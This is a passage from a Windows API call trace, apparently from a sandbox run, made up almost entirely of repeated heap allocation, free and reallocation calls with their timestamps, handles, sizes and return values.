dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.923] GetProcessHeap () returned 0x4f10000 [0060.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.924] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.924] GetProcessHeap () returned 0x4f10000 [0060.925] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.925] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.925] GetProcessHeap () returned 0x4f10000 [0060.926] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.926] GetProcessHeap () returned 0x4f10000 [0060.926] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.927] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.927] GetProcessHeap () returned 0x4f10000 [0060.928] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.928] GetProcessHeap () returned 0x4f10000 [0060.928] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f707c8 [0060.929] GetProcessHeap () returned 0x4f10000 [0060.929] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f707c8 | out: hHeap=0x4f10000) returned 1 [0060.930] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12218, Size=0x84) returned 0x4f7f8a8 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12218 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12228 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12238 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12228 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12238 | out: hHeap=0x4f10000) returned 1 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12238 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.930] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12228 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.930] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12238 | out: hHeap=0x4f10000) returned 1 [0060.930] GetProcessHeap () returned 0x4f10000 [0060.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12238 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12228 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12238 | out: hHeap=0x4f10000) returned 1 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12238 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12228 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12238 | out: hHeap=0x4f10000) returned 1 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12238 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12228 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12238 | out: hHeap=0x4f10000) returned 1 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0xc) returned 0x7cf4648 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12228 | out: hHeap=0x4f10000) returned 1 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x10) returned 0x7cf4618 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf4648 | out: hHeap=0x4f10000) returned 1 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x14) returned 0x4f78ad0 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf4618 | out: hHeap=0x4f10000) returned 1 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.931] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d49a28 [0060.931] GetProcessHeap () returned 0x4f10000 [0060.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f78ad0 | out: hHeap=0x4f10000) returned 1 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d49bb8 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d49a28 | out: hHeap=0x4f10000) returned 1 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x38) returned 0x7d36500 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d49bb8 | out: hHeap=0x4f10000) returned 1 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x70) returned 0x7ce6108 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d36500 | out: hHeap=0x4f10000) returned 1 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0xe0) returned 0x7d3f5c8 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7ce6108 | out: hHeap=0x4f10000) returned 1 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0xe4) returned 0x7d239c0 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d3f5c8 | out: hHeap=0x4f10000) returned 1 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d239c0 | out: hHeap=0x4f10000) returned 1 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.932] GetProcessHeap () returned 0x4f10000 [0060.932] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] HeapFree (in: 